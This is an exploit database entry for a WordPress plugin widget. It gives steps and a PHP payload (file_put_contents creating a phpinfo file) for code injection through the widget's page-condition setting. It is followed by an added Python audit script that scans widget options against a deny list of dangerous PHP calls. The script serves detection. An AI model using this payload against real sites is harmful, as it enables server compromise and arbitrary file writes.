## https://sploitus.com/exploit?id=WPEX-ID:0D6B46CB-5244-486F-AD70-4023907AC9EB
- Add the plugin's widget (e.g. via /wp-admin/widgets.php)
- Put the following payload (replacing WEBROOT with the real value) in the "Show only if page" setting of the widget: `file_put_contents('/WEBROOT/info.php', '<?php phpinfo(); ?>')`
- Save the settings and click the Update button on the Widgets page
- Then go to /info.php (or whatever path was set above) to access the created info.php
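
A defender-side audit for the condition these steps rely on, added here as an example (it is not part of the original entry or the plugin's code): it scans exported `wp_options` rows for PHP calls stored inside widget settings. WordPress keeps widget settings as PHP-serialized arrays in `widget_*` options; the option name `widget_example_plugin`, the `show_if` key and the deny list below are assumptions, and the sample rows are constructed.

```python
import re

# Calls that never belong in a "show only on this page" condition.
# Constructed deny list for this example; tune it for your site.
RISKY = re.compile(
    r"\b(file_put_contents|fopen|fwrite|eval|assert|system|exec|shell_exec|"
    r"passthru|popen|proc_open|base64_decode)\s*\(|<\?php",
    re.IGNORECASE,
)
STR_HEADER = re.compile(rb's:(\d+):"')

def php_strings(serialized: bytes):
    """Yield each string in a PHP-serialized value, honouring the declared
    byte length (s:<len>:"...";) so embedded quotes cannot confuse parsing."""
    pos = 0
    while (m := STR_HEADER.search(serialized, pos)):
        end = m.end() + int(m.group(1))
        yield serialized[m.end():end].decode("utf-8", "replace")
        pos = end

def audit_widget_options(rows):
    """rows: (option_name, serialized_value) pairs exported from wp_options.
    Returns [(option_name, offending_string, matched_token), ...]."""
    findings = []
    for name, value in rows:
        if not name.startswith("widget_"):
            continue  # only widget settings are in scope
        for text in php_strings(value):
            m = RISKY.search(text)
            if m:
                findings.append((name, text, m.group(1) or m.group(0)))
    return findings

def _s(text):
    """Build one serialized PHP string with a correct length prefix."""
    b = text.encode()
    return b's:%d:"%s";' % (len(b), b)

# Constructed sample rows; option and key names are hypothetical.
PAYLOAD = "file_put_contents('/WEBROOT/info.php', '<?php phpinfo(); ?>')"
SAMPLE_ROWS = [
    ("widget_example_plugin", b"a:1:{i:2;a:2:{" + _s("title") + _s("News")
     + _s("show_if") + _s(PAYLOAD) + b"}}"),
    ("widget_text", b"a:1:{i:1;a:1:{" + _s("text") + _s("Opening hours") + b"}}"),
    ("siteurl", _s("https://example.test")),
]

if __name__ == "__main__":
    for name, text, token in audit_widget_options(SAMPLE_ROWS):
        print(f"{name}: '{token}' found in widget setting: {text}")
```

A hit on a `widget_*` row is a reason to review who saved that widget and to look for unexpected PHP files under the web root, such as the `info.php` created in the steps above.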